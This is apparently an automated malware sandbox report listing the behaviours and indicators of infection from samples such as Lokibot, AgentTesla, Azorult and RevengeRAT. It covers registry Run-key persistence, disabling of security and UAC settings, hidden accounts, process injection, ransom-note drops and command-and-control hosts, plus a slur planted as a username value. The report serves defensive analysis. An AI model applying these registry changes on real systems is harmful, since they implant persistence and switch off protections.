1832 taskhostw.exe 4976 Sevgi.a.exe 4772 Sevgi.a.exe 6068 svchost.exe 5796 taskhostw.exe 5056 svchost.exe 1768 IconDance.exe 4604 IconDance.exe 3468 IconDance.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc Process not Found Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager Process not Found Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys Process not Found Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc Process not Found Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power Process not Found Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys Process not Found -
Loads dropped DLL 14 IoCs
pid Process 1864 svchost.exe 5960 regsvr32.exe 968 rundll32.exe 968 rundll32.exe 1156 Setup.exe 1156 Setup.exe 5980 Setup.exe 5980 Setup.exe 1156 Setup.exe 1156 Setup.exe 1156 Setup.exe 5980 Setup.exe 5980 Setup.exe 5980 Setup.exe -
Modifies file permissions 1 TTPs 62 IoCs
pid Process 2984 icacls.exe 832 icacls.exe 1916 icacls.exe 4720 icacls.exe 2776 icacls.exe 3664 icacls.exe 500 icacls.exe 1604 icacls.exe 4844 icacls.exe 4080 icacls.exe 2540 icacls.exe 3048 icacls.exe 3344 icacls.exe 4620 icacls.exe 1920 icacls.exe 4396 icacls.exe 4248 icacls.exe 3860 icacls.exe 4808 icacls.exe 3060 icacls.exe 924 icacls.exe 4132 icacls.exe 1332 icacls.exe 2808 icacls.exe 4664 icacls.exe 4684 icacls.exe 736 icacls.exe 1756 icacls.exe 2096 icacls.exe 5108 icacls.exe 3428 icacls.exe 1264 icacls.exe 3576 icacls.exe 3344 icacls.exe 2344 icacls.exe 4620 icacls.exe 924 icacls.exe 4184 icacls.exe 4504 icacls.exe 5076 icacls.exe 1844 icacls.exe 2380 icacls.exe 4296 icacls.exe 1020 icacls.exe 4064 icacls.exe 4732 icacls.exe 2260 icacls.exe 3164 icacls.exe 4464 icacls.exe 1756 icacls.exe 4180 icacls.exe 3048 icacls.exe 3736 icacls.exe 3132 icacls.exe 4808 icacls.exe 3176 icacls.exe 5116 icacls.exe 1396 icacls.exe 2980 icacls.exe 4048 icacls.exe 4108 icacls.exe 924 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/1492-5346-0x0000000005260000-0x0000000005274000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Windows security modification 2 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" wmsncs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" wmsncs.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
Adds Run key to start application 2 TTPs 22 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop butterflyondesktop.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CERTCA = "C:\\WINDOWS\\CERTCA.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Wins Service = "C:\\Windows\\system32\\wins\\wmsncs.exe" wmsncs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost32 = "C:\\Windows\\system32\\dllhost32.exe" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\CMDKEY = "C:\\WINDOWS\\CMDKEY.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Spool Driver Service = "C:\\Windows\\system32\\spool\\drivers\\wmsncs.exe" wmsncs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\StartUp = "C:\\Windows\\Maria.doc .exe" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NvidMediaCenter = "C:\\Program Files (x86)\\Common Files\\System\\wmsncs.exe" wmsncs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Netagent = "c:\\windows\\system\\sysfile.exe" Sevgi.a.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" 6AdwCleaner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MPREXE = "C:\\WINDOWS\\MPREXE.EXE" Opaserv.l.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsrv = "c:\\windows\\system\\winsrv.exe" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\COREMAS = "C:\\WINDOWS\\COREMAS.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Wmsncs Service = "C:\\Windows\\Fonts\\wmsncs.exe" wmsncs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Netagent = "c:\\windows\\system\\sysfile.exe" Sevgi.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost32 = "C:\\Windows\\system32\\dllhost32.exe" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\BATMETER = "C:\\WINDOWS\\BATMETER.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\scr = "c:\\windows\\system\\scr.scr" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\LoadManager = "c:\\windows\\system\\msload.exe" Opaserv.l.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\D3D12 = "C:\\WINDOWS\\D3D12.EXE" Opaserv.l.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe" RegSvcs.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe -
pid Process 1556 powershell.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini AgentTesla.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-21-3625106387-4207083342-115176794-1000\desktop.ini msedge.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3625106387-4207083342-115176794-1000\desktop.ini explorer.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\i: Process not Found File opened (read-only) \??\k: Process not Found File opened (read-only) \??\z: Process not Found File opened (read-only) \??\D: Process not Found File opened (read-only) \??\F: Process not Found File opened (read-only) \??\g: Process not Found File opened (read-only) \??\s: Process not Found File opened (read-only) \??\y: Process not Found File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\r: Process not Found File opened (read-only) \??\x: Process not Found File opened (read-only) \??\q: Process not Found File opened (read-only) \??\m: Process not Found File opened (read-only) \??\n: Process not Found File opened (read-only) \??\o: Process not Found File opened (read-only) \??\l: Process not Found File opened (read-only) \??\F: Process not Found File opened (read-only) \??\j: Process not Found File opened (read-only) \??\u: Process not Found File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\t: Process not Found File opened (read-only) \??\D: Process not Found File opened (read-only) \??\h: Process not Found File opened (read-only) \??\p: Process not Found File opened (read-only) \??\v: Process not Found File opened (read-only) \??\w: Process not Found File opened (read-only) \??\e: Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 34 IoCs
flow ioc 143 raw.githubusercontent.com 157 raw.githubusercontent.com 3159 0.tcp.ngrok.io 4447 raw.githubusercontent.com 2311 0.tcp.ngrok.io 2942 raw.githubusercontent.com 3110 0.tcp.ngrok.io 3876 0.tcp.ngrok.io 3947 0.tcp.ngrok.io 52 raw.githubusercontent.com 1970 0.tcp.ngrok.io 2937 0.tcp.ngrok.io 3269 0.tcp.ngrok.io 4446 raw.githubusercontent.com 51 raw.githubusercontent.com 1889 0.tcp.ngrok.io 2941 raw.githubusercontent.com 4201 0.tcp.ngrok.io 4441 0.tcp.ngrok.io 2715 0.tcp.ngrok.io 3580 0.tcp.ngrok.io 144 raw.githubusercontent.com 156 raw.githubusercontent.com 166 iplogger.org 167 iplogger.org 397 0.tcp.ngrok.io 3503 0.tcp.ngrok.io 3647 0.tcp.ngrok.io 4146 0.tcp.ngrok.io 4433 0.tcp.ngrok.io 2136 0.tcp.ngrok.io 3726 0.tcp.ngrok.io 3052 0.tcp.ngrok.io 3225 0.tcp.ngrok.io -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 bot.whatismyipaddress.com 129 ip-api.com -
Modifies WinLogon 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName = "COCK_SUCKING_FAGGOT" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName = "COCK_SUCKING_FAGGOT" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName = "COCK_SUCKING_FAGGOT" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName = "COCK_SUCKING_FAGGOT" Process not Found -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023faf-4306.dat autoit_exe behavioral1/files/0x0007000000023fc4-4412.dat autoit_exe behavioral1/files/0x000a000000023ded-4494.dat autoit_exe behavioral1/memory/2980-4687-0x0000000000800000-0x00000000008EC000-memory.dmp autoit_exe -
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\heap41a\offspring\autorun.inf Process not Found File opened for modification C:\heap41a\Offspring\autorun.inf Process not Found -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\windows\SysWOW64\progman.exe Process not Found File created C:\windows\SysWOW64\imapi.exe Process not Found File created C:\windows\SysWOW64\services.exe Process not Found File created C:\windows\SysWOW64\autochk.exe Process not Found File created C:\windows\SysWOW64\services.exe Process not Found File created C:\Windows\SysWOW64\win.exe:SmartScreen:$DATA Process not Found File created C:\Windows\SysWOW64\dllhost32.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\alg.exe Process not Found File created C:\windows\SysWOW64\ntkrnlpa.exe Process not Found File created C:\WINDOWS\SysWOW64\userinit.exe Process not Found File created C:\Windows\SysWOW64\chcp.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\dumprep.exe Process not Found File created C:\Windows\SysWOW64\dllhost32.exe Process not Found File created C:\windows\SysWOW64\ctfmon.exe Process not Found File created C:\Windows\SysWOW64\progman.exe:SmartScreen:$DATA Process not Found File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File created C:\Windows\System32\spool\drivers\wmsncs.exe\:SmartScreen:$DATA wmsncs.exe File created C:\Windows\SysWOW64\userinit32.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\wuauclt.exe Process not Found File created C:\windows\SysWOW64\bootok.exe Process not Found File opened for modification C:\Windows\SysWOW64\userinit32.exe Process not Found File created C:\windows\SysWOW64\ntkrnlpa.exe Process not Found File created C:\windows\SysWOW64\ctfmon.exe Process not Found File created C:\windows\SysWOW64\systray.exe Process not Found File created C:\windows\SysWOW64\ntoskrnl.exe Process not Found File created C:\windows\SysWOW64\bootok.exe Process not Found File created C:\Windows\SysWOW64\wuauclt.exe:SmartScreen:$DATA Process not Found File opened for modification C:\Windows\SysWOW64\wins\wmsncs.exe wmsncs.exe File created C:\Windows\SysWOW64\alg.exe:SmartScreen:$DATA Process not Found File created C:\WINDOWS\SysWOW64\userinit.exe Process not Found File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File created C:\windows\SysWOW64\logon.exe Process not Found File created C:\windows\SysWOW64\chcp.exe Process not Found File created C:\Windows\SysWOW64\logon.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\MDM.exe Process not Found File created C:\windows\SysWOW64\systray.exe Process not Found File created C:\Windows\SysWOW64\wowexec.exe:SmartScreen:$DATA Process not Found File opened for modification C:\Windows\SysWOW64\exe\rutserv.pdb rutserv.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File created C:\Windows\system32\spool\drivers\wmsncs.exe wmsncs.exe File created C:\windows\SysWOW64\win.exe Process not Found File created C:\Windows\SysWOW64\bootok.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\dumprep.exe Process not Found File created C:\Windows\SysWOW64\wins\wmsncs.exe wmsncs.exe File created C:\Windows\SysWOW64\dllhost32.exe Process not Found File created C:\Windows\SysWOW64\ntoskrnl.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\wowexec.exe Process not Found File created C:\Windows\SysWOW64\userinit32.exe Process not Found File created C:\windows\SysWOW64\ntoskrnl.exe Process not Found File created C:\windows\SysWOW64\alg.exe Process not Found File created C:\windows\SysWOW64\shutdown.exe Process not Found File created C:\Windows\SysWOW64\ntkrnlpa.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\win.exe Process not Found File created C:\windows\SysWOW64\regedit.exe Process not Found File created C:\windows\SysWOW64\chkntfs.exe Process not Found File opened for modification C:\Windows\SysWOW64\symbols\exe\rutserv.pdb rutserv.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe File created C:\windows\SysWOW64\progman.exe Process not Found File created C:\Windows\SysWOW64\imapi.exe:SmartScreen:$DATA Process not Found File created C:\Windows\SysWOW64\MDM.exe:SmartScreen:$DATA Process not Found File created C:\Windows\SysWOW64\services.exe:SmartScreen:$DATA Process not Found File created C:\windows\SysWOW64\wowexec.exe Process not Found File created C:\windows\SysWOW64\shutdown.exe Process not Found File opened for modification C:\Windows\system32\spool\drivers\wmsncs.exe wmsncs.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 1492 set thread context of 4936 1492 Lokibot.exe 729 PID 3020 set thread context of 5724 3020 RevengeRAT.exe 986 PID 1332 set thread context of 2004 1332 RevengeRAT.exe 985 PID 2004 set thread context of 5100 2004 RegSvcs.exe 987 PID 5724 set thread context of 5156 5724 RegSvcs.exe 989 PID 6068 set thread context of 4928 6068 svchost.exe 1106 PID 4928 set thread context of 2656 4928 RegSvcs.exe 1112 PID 5056 set thread context of 5572 5056 svchost.exe 1298 PID 5572 set thread context of 5568 5572 RegSvcs.exe 1299 PID 3276 set thread context of 3540 3276 svchost.exe 1474 PID 3540 set thread context of 3384 3540 RegSvcs.exe 1475 PID 4704 set thread context of 3464 4704 Process not Found 1662 PID 3464 set thread context of 7056 3464 Process not Found 1627 PID 1444 set thread context of 5860 1444 Process not Found 1787 PID 5860 set thread context of 7008 5860 Process not Found 1817 -
resource yara_rule behavioral1/files/0x0009000000023fd3-4610.dat upx behavioral1/memory/1232-4615-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/1232-4651-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/files/0x000e000000023d7d-4680.dat upx behavioral1/memory/2980-4685-0x0000000000800000-0x00000000008EC000-memory.dmp upx behavioral1/memory/2980-4687-0x0000000000800000-0x00000000008EC000-memory.dmp upx behavioral1/files/0x0009000000023fd5-5245.dat upx behavioral1/memory/7128-8041-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/memory/4044-8049-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/memory/6304-8050-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/memory/5072-8047-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/memory/7128-8039-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/files/0x000c00000002408c-8022.dat upx behavioral1/memory/4044-8097-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/memory/6304-8104-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/memory/6304-8377-0x0000000000400000-0x0000000000486000-memory.dmp upx behavioral1/memory/4044-8379-0x0000000000400000-0x0000000000486000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Informix.xsl AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml AgentTesla.exe File created C:\Program Files (x86)\Common Files\System\wmsncs.exe\:SmartScreen:$DATA wmsncs.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\EXCEL.VisualElementsManifest.xml AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as90.xsl AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\19.jpg AgentTesla.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\symbase.xml AgentTesla.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ea-sym.xml AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xsl AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\offlineUtilities.js AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_pdf_18.svg AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\plugin.js AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipscht.xml AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\vpaid.html AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\webviewBoot.min.js AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_should.help.txt AgentTesla.exe File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-disabled.svg AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\selector.js AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\plugin.js AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\office.core.operational.js AgentTesla.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\powerpointmui.msi.16.en-us.vreg.dat AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_delete_18.svg AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\ui-strings.js AgentTesla.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MotionController_Pair.jpg AgentTesla.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\video_offline_demo_page2.jpg AgentTesla.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml AgentTesla.exe File opened for modification C:\Program 